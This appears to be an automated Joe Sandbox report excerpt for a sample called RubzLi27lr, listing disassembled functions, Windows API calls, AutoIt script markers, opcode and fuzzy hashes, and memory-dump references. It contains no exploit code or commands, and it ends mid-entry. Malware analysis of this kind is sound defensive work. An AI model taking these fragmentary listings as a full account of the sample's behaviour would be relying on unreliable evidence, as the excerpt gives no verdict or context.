                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                  • String ID: Control Panel\Mouse
                                                                                                                  • API String ID: 3677997916-824357125
                                                                                                                  • Opcode ID: 6d6f9b3b949436831775a1461239e514f9683e53a85d23bc6332ea4a84dbb62a
                                                                                                                  • Instruction ID: 6c760a485b9d36defbacbcc8e1c7abaf94e9e230b7af58c5f23e26880fbee623
                                                                                                                  • Opcode Fuzzy Hash: 6d6f9b3b949436831775a1461239e514f9683e53a85d23bc6332ea4a84dbb62a
                                                                                                                  • Instruction Fuzzy Hash: 5A112AB6511208FFDF218FA5DC44AEEBBBCEF05744B104559A806D7215D6719F409760
                                                                                                                  Function 00ABDFD0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  • Variable must be of type 'Object'., xrefs: 00B032B7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: Variable must be of type 'Object'.
                                                                                                                  • API String ID: 0-109567571
                                                                                                                  • Opcode ID: f6f491a61dc1bbd64d9ae6d781d851f06809476f83a8fcf9b427e7f7975fa3ee
                                                                                                                  • Instruction ID: 54de216988f872267d9993daf89a4e8de664a66e5ed0f038c4fd656954b8ce45
                                                                                                                  • Opcode Fuzzy Hash: f6f491a61dc1bbd64d9ae6d781d851f06809476f83a8fcf9b427e7f7975fa3ee
                                                                                                                  • Instruction Fuzzy Hash: 74C26675A00214CFCB24CF98C885AEDB7F9FB18700F248569E916AB3A2D775AD41CB91
                                                                                                                  Function 00ACFDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00AD0668
                                                                                                                    • Part of subcall function 00AD32A4: RaiseException.KERNEL32(?,?,?,00AD068A,?,00B81444,?,?,?,?,?,?,00AD068A,00AB1129,00B78738,00AB1129), ref: 00AD3304
                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00AD0685
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                  • String ID: Unknown exception
                                                                                                                  • API String ID: 3476068407-410509341
                                                                                                                  • Opcode ID: df11dc8a959909ea413779a1e4add2fa383deda6af7c5fead9bdc9294348b0bd
                                                                                                                  • Instruction ID: 969b786e9124faee56b1e9cbfb88ebe5fda6b3785513dfa781965fb2c5c7fb0b
                                                                                                                  • Opcode Fuzzy Hash: df11dc8a959909ea413779a1e4add2fa383deda6af7c5fead9bdc9294348b0bd
                                                                                                                  • Instruction Fuzzy Hash: 48F0C23490020D7BCF00BB64E94AE9E77BD5E00354F608176B82AD66A5EF71DB25C581
                                                                                                                  Function 0180CAA8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 0180CAED
                                                                                                                  • ExitProcess.KERNEL32(00000000), ref: 0180CB0C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2144200342.000000000180B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0180B000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_180b000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$CreateExit
                                                                                                                  • String ID: D
                                                                                                                  • API String ID: 126409537-2746444292
                                                                                                                  • Opcode ID: 5eb2aae7a9647d9e2c45f82c1b7c95c0f5ecba5966e3f1c76f424d9cb9e516ac
                                                                                                                  • Instruction ID: 96682a2eabe773ab9ee4ce573802fd000a80009618ec78e1b817eea4ead0bf19
                                                                                                                  • Opcode Fuzzy Hash: 5eb2aae7a9647d9e2c45f82c1b7c95c0f5ecba5966e3f1c76f424d9cb9e516ac
                                                                                                                  • Instruction Fuzzy Hash: 32F0ECB554024CABDB60EFE4CD49FEE7778BF04701F508908FA4ADA180DB7496088B61
                                                                                                                  Function 00B23017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00B2302F
                                                                                                                  • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00B23044
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Temp$FileNamePath
                                                                                                                  • String ID: aut
                                                                                                                  • API String ID: 3285503233-3010740371
                                                                                                                  • Opcode ID: 7fd593ff9066f0a31beda7e9878ebab7e77cb630607fbd90689bcda53e600888
                                                                                                                  • Instruction ID: 6697bb3c676793916f5f401a2332c3cbb9628cac6667cebda2c4ed3fe65b2115
                                                                                                                  • Opcode Fuzzy Hash: 7fd593ff9066f0a31beda7e9878ebab7e77cb630607fbd90689bcda53e600888
                                                                                                                  • Instruction Fuzzy Hash: ECD05E7650132867DA60A7A4AC0EFCB3F6CEB05B50F0002A1B655E30A1DEF09A84CAD4
                                                                                                                  Function 00B37F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00B382F5
                                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 00B382FC
                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,?), ref: 00B384DD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 146820519-0
                                                                                                                  • Opcode ID: 95d1bc9f9988e4ba6c6ff1f6a0b4457e76e854a8c32a76884d1ce4b5ab671f2b
                                                                                                                  • Instruction ID: aa8e9f7b6f6735ebe966120171d0c52bae6f5b01fccc53e0b6ead220bd07ea57
                                                                                                                  • Opcode Fuzzy Hash: 95d1bc9f9988e4ba6c6ff1f6a0b4457e76e854a8c32a76884d1ce4b5ab671f2b
                                                                                                                  • Instruction Fuzzy Hash: 4B126A71A083419FC724DF28C584B6ABBE5FF89314F14899DF8898B352DB31E945CB92
                                                                                                                  Function 00AE5AA9 Relevance: 4.7, APIs: 3, Instructions: 186COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: f475fa7e3f0faf9041ce0e70a19e25d1911ddee3a91ecbf7dc57253d4e633ad2
                                                                                                                  • Instruction ID: 65ee9b71029230881835b103fef60bc76746ba6840d394cb6bb4016e2ca78031
                                                                                                                  • Opcode Fuzzy Hash: f475fa7e3f0faf9041ce0e70a19e25d1911ddee3a91ecbf7dc57253d4e633ad2
                                                                                                                  • Instruction Fuzzy Hash: 7251D375D006899FCB109FBAE945FEFBBB8AF45318F24005AF406A7292D7719A01CB61
                                                                                                                  Function 00AB10F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AB1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00AB1BF4
                                                                                                                    • Part of subcall function 00AB1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00AB1BFC
                                                                                                                    • Part of subcall function 00AB1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00AB1C07
                                                                                                                    • Part of subcall function 00AB1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00AB1C12
                                                                                                                    • Part of subcall function 00AB1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00AB1C1A
                                                                                                                    • Part of subcall function 00AB1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00AB1C22
                                                                                                                    • Part of subcall function 00AB1B4A: RegisterWindowMessageW.USER32(00000004,?,00AB12C4), ref: 00AB1BA2
                                                                                                                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00AB136A
                                                                                                                  • OleInitialize.OLE32 ref: 00AB1388
                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000), ref: 00AF24AB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1986988660-0
                                                                                                                  • Opcode ID: 39c9afad42bf739e30acab439e8227d389896e38d2e484199f8fcbe68330ac7e
                                                                                                                  • Instruction ID: 3e0895d71f4b079590da3819f891d3f9ea2cf03deac7d6e244ba6b202b7f4f5b
                                                                                                                  • Opcode Fuzzy Hash: 39c9afad42bf739e30acab439e8227d389896e38d2e484199f8fcbe68330ac7e
                                                                                                                  • Instruction Fuzzy Hash: 517199B59132008EC384EF7DE956A953AECBBA87447588A6AD40AD7372EF308503CF55
                                                                                                                  Function 00B1C161 Relevance: 4.6, APIs: 3, Instructions: 74timewindowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AB3923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00AB3A04
                                                                                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B1C259
                                                                                                                  • KillTimer.USER32(?,00000001,?,?), ref: 00B1C261
                                                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B1C270
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: IconNotifyShell_Timer$Kill
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3500052701-0
                                                                                                                  • Opcode ID: 207a17f0ab566cfe917ae1337944bf42f87ee02ef5e889294c5d178978ee9bc4
                                                                                                                  • Instruction ID: bf21412ad990b31b6051781703a2081f20cd92f6ea10b7c9c6179e10e6e49301
                                                                                                                  • Opcode Fuzzy Hash: 207a17f0ab566cfe917ae1337944bf42f87ee02ef5e889294c5d178978ee9bc4
                                                                                                                  • Instruction Fuzzy Hash: 9531BF70944344AFEB628F648895BEABFECAB17708F0004DAD69AA7241C7745AC5CB91
                                                                                                                  Function 00AE86AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CloseHandle.KERNELBASE(00000000,00000000,?,?,00AE85CC,?,00B78CC8,0000000C), ref: 00AE8704
                                                                                                                  • GetLastError.KERNEL32(?,00AE85CC,?,00B78CC8,0000000C), ref: 00AE870E
                                                                                                                  • __dosmaperr.LIBCMT ref: 00AE8739
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2583163307-0
                                                                                                                  • Opcode ID: 3c24398a941d73121efd9bd1d99dd12e7ecfb70f92334443c684335315ffae1f
                                                                                                                  • Instruction ID: 5959a02716125386a03a26eab08b76c52700a985a21ee86e97f98f6ec99ab80c
                                                                                                                  • Opcode Fuzzy Hash: 3c24398a941d73121efd9bd1d99dd12e7ecfb70f92334443c684335315ffae1f
                                                                                                                  • Instruction Fuzzy Hash: CA018E32A052E016C2607336BA4577E7B594B83B78F390119F81C8F1D2DEB8CC81C250
                                                                                                                  Function 00ABDB38 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • TranslateMessage.USER32(?), ref: 00ABDB7B
                                                                                                                  • DispatchMessageW.USER32(?), ref: 00ABDB89
                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00ABDB9F
                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 00ABDBB1
                                                                                                                  • TranslateAcceleratorW.USER32(?,?,?), ref: 00B01CC9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3288985973-0
                                                                                                                  • Opcode ID: c33338397eb26229f2f64f00dd81511fad9964eb22727c9b63bf39140c8189ea
                                                                                                                  • Instruction ID: 50bafa809b6447c90c4ae8a9512c00a624b2e656473b5e053e385bee02e150f1
                                                                                                                  • Opcode Fuzzy Hash: c33338397eb26229f2f64f00dd81511fad9964eb22727c9b63bf39140c8189ea
                                                                                                                  • Instruction Fuzzy Hash: 33F05E306463409BEB74CBA48C49FEA7BECEB45710F104A58E61A970D0EB309948CB25
                                                                                                                  Function 00B22FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00B22CD4,?,?,?,00000004,00000001), ref: 00B22FF2
                                                                                                                  • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00B22CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00B23006
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00B22CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00B2300D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$CloseCreateHandleTime
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3397143404-0
                                                                                                                  • Opcode ID: 122adbe2a1ccb17448f8d0260e6cb5dc129079ff1f344eeb6e7938476d3a3475
                                                                                                                  • Instruction ID: 1c03cf5343ccd3e9a4b6aa4bfc0676cefa89ff2b999b4a9e82cb4b84e2312701
                                                                                                                  • Opcode Fuzzy Hash: 122adbe2a1ccb17448f8d0260e6cb5dc129079ff1f344eeb6e7938476d3a3475
                                                                                                                  • Instruction Fuzzy Hash: 0CE0863628122077D6301759BC0DF8B3E5CE787F71F104210F759760D04AA06A0142A8
                                                                                                                  Function 00AC1310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • __Init_thread_footer.LIBCMT ref: 00AC17F6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Init_thread_footer
                                                                                                                  • String ID: CALL
                                                                                                                  • API String ID: 1385522511-4196123274
                                                                                                                  • Opcode ID: 708ec279867b7b6a292561d6230e55ffa8f200589d6568e9ddfdc6c15ba2a6ea
                                                                                                                  • Instruction ID: e973768b3f7353bee51c43b8497cf4d6d9f38a3794ca4198acd62aab9972c63c
                                                                                                                  • Opcode Fuzzy Hash: 708ec279867b7b6a292561d6230e55ffa8f200589d6568e9ddfdc6c15ba2a6ea
                                                                                                                  • Instruction Fuzzy Hash: EB2269706082019FC714DF24C990F2ABBF1BF96314F25896DF49A8B3A2D731E955CB92
                                                                                                                  Function 00B26EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _wcslen.LIBCMT ref: 00B26F6B
                                                                                                                    • Part of subcall function 00AB4ECB: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00B81418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AB4EFD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LibraryLoad_wcslen
                                                                                                                  • String ID: >>>AUTOIT SCRIPT<<<
                                                                                                                  • API String ID: 3312870042-2806939583
                                                                                                                  • Opcode ID: da847024257e3d506bb18a2a6a093e1e87360e3fde0dcb584c3ff003a283e371
                                                                                                                  • Instruction ID: 4507994cc6628236de2de8609ff062bfd5154fd5e809db932475d7e047d48fdd
                                                                                                                  • Opcode Fuzzy Hash: da847024257e3d506bb18a2a6a093e1e87360e3fde0dcb584c3ff003a283e371
                                                                                                                  • Instruction Fuzzy Hash: C6B17F311082118FCB14EF24D5919AEB7E9EF95310F14899DF49A972A2EF30ED49CB92
                                                                                                                  Function 00AB2DE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetOpenFileNameW.COMDLG32(?), ref: 00AF2C8C
                                                                                                                    • Part of subcall function 00AB3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AB3A97,?,?,00AB2E7F,?,?,?,00000000), ref: 00AB3AC2
                                                                                                                    • Part of subcall function 00AB2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00AB2DC4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Name$Path$FileFullLongOpen
                                                                                                                  • String ID: X
                                                                                                                  • API String ID: 779396738-3081909835
                                                                                                                  • Opcode ID: e0e6b21705ed138d5e7a76c5536ffd901433db3f5e8d0ab2214a8cb136bbe526
                                                                                                                  • Instruction ID: d2d12958b96c06ca088b1cf96b2f858ebfe6f28abe9a35a3db7dc92395f348bb
                                                                                                                  • Opcode Fuzzy Hash: e0e6b21705ed138d5e7a76c5536ffd901433db3f5e8d0ab2214a8cb136bbe526
                                                                                                                  • Instruction Fuzzy Hash: 6A219371A1029C9FDF01DF94C945BEE7BFCAF49704F00805AE519A7242DBB49A898F61
                                                                                                                  Function 00B22557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
